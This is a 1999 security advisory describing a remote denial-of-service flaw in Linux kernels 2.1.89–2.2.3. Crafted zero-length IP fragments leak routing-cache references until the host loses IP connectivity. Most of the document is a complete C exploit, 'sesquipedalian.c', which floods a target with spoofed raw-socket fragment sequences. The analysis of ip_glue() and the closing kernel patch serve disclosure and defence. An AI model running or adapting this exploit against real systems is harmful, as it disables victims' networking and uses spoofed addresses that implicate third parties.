COMMAND

    kernel

SYSTEMS AFFECTED

    Linux prior to between 2.1.89 and 2.2.3

PROBLEM

    John McDonald found  following.  The  recent release of  the Linux
    2.2.4 kernel fixed  a remote denial  of service problem  in the IP
    fragment  handling  code.   If  you  are  running  a  Linux kernel
    between 2.1.89 and 2.2.3, it would probably be a good idea to  get
    the latest version.  The impact  of this problem is that a  remote
    attacker  can  effectively  disable  a  target's  IP connectivity.
    However, for  the attack  to succeed,  the attacker  will have  to
    deliver several thousand packets to the target, which can take  up
    to several minutes.  A quick exploit and the patch are appended to
    the  end  of  this  post.   The  problem  starts  in  ip_glue() in
    ip_fragment.c:

	/* Copy the data portions of all fragments into the new buffer. */
	fp = qp->fragments;
	count = qp->ihlen;
	while(fp) {
		if ((fp->len < 0) || ((count + fp->len) > skb->len))
			goto out_invalid;
		memcpy((ptr + fp->offset), fp->ptr, fp->len);
		if (count == qp->ihlen) {
			skb->dst = dst_clone(fp->skb->dst);
			skb->dev = fp->skb->dev;
		}
		count += fp->len;
		fp = fp->next;
	}

    The problem in this  code is that if  you can get a  fragment into
    the qp->fragments list that  has a length of  0, and is the  first
    fragment in the list, then the call to dst_clone() will happen  an
    extra  time.   The  first  time  through  the  loop,  count   will
    necessarily  equal  qp->ihlen,  causing  dst_clone() to be called.
    However, if  fp->len happens  to equal  0, then  count +=  fp->len
    won't increase it, and the next time through the loop, count  will
    still equal qp->ihlen.   dst_clone() increments a  usage count  on
    an element in the routing cache.  Our 0 length fragment will cause
    this element in the cache to become stranded.  The kernel will not
    free it when it does  the garbage collection of the  cache because
    it will think it is currently in use.  The other component of  the
    problem is that the  call to allocate a  new entry in the  routing
    cache does  a check  to see  if the  hashtable that  comprises the
    cache is  at a  saturated state.   If it  is, it  proceeds to do a
    garbage collection.  If the number of entries in the cache,  after
    this garbage collection, is still higher than the threshold,  then
    dst_alloc() will fail.  So, if we generate enough stranded entries
    in the routing cache (4096 in 2.2.3) via our malicious frags, then
    all further calls to dst_alloc will fail.

    We can get a 0 length fragment into the head of the list by  doing
    the following; send a  fragment at offset 0,  with a length of  X,
    and IP_MF set. This creates our list.

    Send a 0 length fragment at  offset 0, where the ip header  length
    is equal to the ip total length,  and IP_MF is set.  This will  be
    treated as coming before the fragment already in our list, because
    it has an offset equal to the offset of the existing fragment.  It
    doesn't overlap any,  because it's end  is equal to  the following
    fragment's offset.   Send a fragment  at offset X,  with IP_MF not
    set.  This will  mark the end of  our set of fragments.  ip_done()
    will return true because it will  see the first frag going from  0
    to 0, the second going from 0 to X, and the third going from X  to
    the end.   Our fragments will  get passed into  ip_glue().  Here's
    the exploit:

    /*
     * sesquipedalian.c - Demonstrates a DoS bug in Linux 2.1.89 - 2.2.3
     *
     * by horizon <jmcdonal@unf.edu>
     *
     * This sends a series of IP fragments such that a 0 length fragment is first
     * in the fragment list. This causes a reference count on the cached routing
     * information for that packet's originator to be incremented one extra time.
     * This makes it impossible for the kernel to deallocate the destination entry
     * and remove it from the cache.
     *
     * If we send enough fragments such that there are at least 4096 stranded
     * dst cache entries, then the target machine will no longer be able to
     * allocate new cache entries, and IP communication will be effectively
     * disabled. You will need to set the delay such that packets are not being
     * dropped, and you will probably need to let the program run for a few
     * minutes to have the full effect. This was written for OpenBSD and Linux.
     *
     * Thanks to vacuum, colonwq, duke, rclocal, sygma, and antilove for testing.
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <netinet/in.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <arpa/inet.h>

    struct my_ip_header
    {
	    unsigned char  ip_hl:4,         /* header length */
		    ip_v:4;               /* version */
	    unsigned char  ip_tos;          /* type of service */
	    unsigned short ip_len;          /* total length */
	    unsigned short ip_id;           /* identification */
	    unsigned short ip_off;          /* fragment offset field */
    #define IP_RF 0x8000                    /* reserved fragment flag */
    #define IP_DF 0x4000                    /* dont fragment flag */
    #define IP_MF 0x2000                    /* more fragments flag */
    #define IP_OFFMASK 0x1fff               /* mask for fragmenting bits */
	    unsigned char  ip_ttl;          /* time to live */
	    unsigned char  ip_p;                    /* protocol */
	    unsigned short ip_sum;          /* checksum */
	    unsigned long ip_src, ip_dst; /* source and dest address */
    };

    struct my_udp_header
    {
	    unsigned short uh_sport;
	    unsigned short uh_dport;
	    unsigned short uh_ulen;
	    unsigned short uh_sum;
    };

    #define IHLEN (sizeof (struct my_ip_header))
    #define UHLEN (sizeof (struct my_udp_header))

    #ifdef __OpenBSD__
    #define EXTRA 8
    #else
    #define EXTRA 0
    #endif

    unsigned short checksum(unsigned short *data,unsigned short length)
    {
	    register long value;
	    u_short i;

	    for(i=0;i<(length>>1);i++)
		    value+=data[i];

	    if((length&1)==1)
		    value+=(data[i]<<8);

	    value=(value&65535)+(value>>16);

	    return(~value);
    }

    unsigned long resolve( char *hostname)
    {
	    long result;
	    struct hostent *hp;

	    if ((result=inet_addr(hostname))==-1)
	    {
		    if ((hp=gethostbyname(hostname))==0)
		    {
			    fprintf(stderr,"Can't resolve target.\n");
			    exit(1);
		    }
		    bcopy(hp->h_addr,&result,4);
	    }
	    return result;
    }

    void usage(void)
    {
	    fprintf(stderr,"usage: ./sqpd [-s sport] [-d dport] [-n count] [-u delay] source target\n");
	    exit(0);
    }


    void sendem(int s, unsigned long source, unsigned long dest,
		    unsigned short sport, unsigned short dport)
    {
	    static char buffer[8192];
	    struct my_ip_header *ip;
	    struct my_udp_header *udp;
	    struct sockaddr_in sa;

	    bzero(&sa,sizeof(struct sockaddr_in));
	    sa.sin_family=AF_INET;
	    sa.sin_port=htons(sport);
	    sa.sin_addr.s_addr=dest;

	    bzero(buffer,IHLEN+32);

	    ip=(struct my_ip_header *)buffer;
	    udp=(struct my_udp_header *)&(buffer[IHLEN]);

	    ip->ip_v = 4;
	    ip->ip_hl = IHLEN >>2;
	    ip->ip_tos = 0;
	    ip->ip_id = htons(random() & 0xFFFF);
	    ip->ip_ttl = 142;
	    ip->ip_p = IPPROTO_UDP;
	    ip->ip_src = source;
	    ip->ip_dst = dest;
	    udp->uh_sport = htons(sport);
	    udp->uh_dport = htons(dport);
	    udp->uh_ulen = htons(64-UHLEN);
	    udp->uh_sum = 0;

	    /* Our first fragment will have an offset of 0, and be 32 bytes
	       long. This gets added as the only element in the fragment
	       list. */

	    ip->ip_len = htons(IHLEN+32);
	    ip->ip_off = htons(IP_MF);
	    ip->ip_sum = 0;
	    ip->ip_sum = checksum((u_short *)buffer,IHLEN+32);

	    if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
	    {
		    perror("sendto");
		    exit(1);
	    }

	    /* Our second fragment will have an offset of 0, and a 0 length.
	       This gets added to the list before our previous fragment,
	       making it first in line. */

	    ip->ip_len = htons(IHLEN);
	    ip->ip_off = htons(IP_MF);
	    ip->ip_sum = 0;
	    ip->ip_sum = checksum((u_short *)buffer,IHLEN);

	    if (sendto(s,buffer,IHLEN+EXTRA,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
	    {
		    perror("sendto");
		    exit(1);
	    }

	    /* Our third and final frag has an offset of 4 (32 bytes), and a
	       length of 32 bytes. This passes our three frags up to ip_glue. */

	    ip->ip_len = htons(IHLEN+32);
	    ip->ip_off = htons(32/8);
	    ip->ip_sum = 0;
	    ip->ip_sum = checksum((u_short *)buffer,IHLEN+32);

	    if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0)
	    {
		    perror("sendto");
		    exit(1);
	    }
    }

    int main(int argc, char **argv)
    {
	    int sock;
	    int on=1,i;
	    unsigned long source, dest;
	    unsigned short sport=53, dport=16384;
	    int delay=20000, count=15000;

	    if (argc<3)
		    usage();

	    while ((i=getopt(argc,argv,"s:d:n:u:"))!=-1)
	    {
		    switch (i)
		    {
			    case 's': sport=atoi(optarg);
				      break;
			    case 'd': dport=atoi(optarg);
				      break;
			    case 'n': count=atoi(optarg);
				      break;
			    case 'u': delay=atoi(optarg);
				      break;
			    default:  usage();
		    }
	    }

	    argc-=optind;
	    argv+=optind;

	    source=resolve(argv[0]);
	    dest=resolve(argv[1]);

	    srandom(time((time_t)0)*getpid());

	    if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
	    {
		    perror("socket");
		    exit(1);
	    }

	    if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0)
	    {
		    perror("setsockopt: IP_HDRINCL");
		    exit(1);
	    }

	    fprintf(stdout,"\nStarting attack on %s ...",argv[1]);

	    for (i=0; i<count; i++)
	    {
		    sendem(sock,source+htonl(i),dest,sport,dport);
		    if (!(i%2))
			    usleep(delay);
		    if (!(i%100))
		    {
			    if (!(i%2000))
				    fprintf(stdout,"\n");
			    fprintf(stdout,".");
			    fflush(stdout);
		    }
	    }

	    fprintf(stdout,"\nDone.\n");
	    exit(1);
    }

SOLUTION

    Upgrade to kernel 2.2.4.  Here is the patch:

    --- linux-2.2.3/net/ipv4/ip_fragment.c  Wed Mar 24 22:48:26 1999
    +++ linux/net/ipv4/ip_fragment.c        Wed Mar 24 22:44:24 1999
    @@ -17,6 +17,7 @@
      *             xxxx            :       Overlapfrag bug.
      *             Ultima          :       ip_expire() kernel panic.
      *             Bill Hawes      :       Frag accounting and evictor fixes.
    + *             John McDonald   :       0 length frag bug.
      */

     #include <linux/types.h>
    @@ -357,7 +358,7 @@
	    fp = qp->fragments;
	    count = qp->ihlen;
	    while(fp) {
    -               if ((fp->len < 0) || ((count + fp->len) > skb->len))
    +               if ((fp->len <= 0) || ((count + fp->len) > skb->len))
			    goto out_invalid;
		    memcpy((ptr + fp->offset), fp->ptr, fp->len);
		    if (count == qp->ihlen) {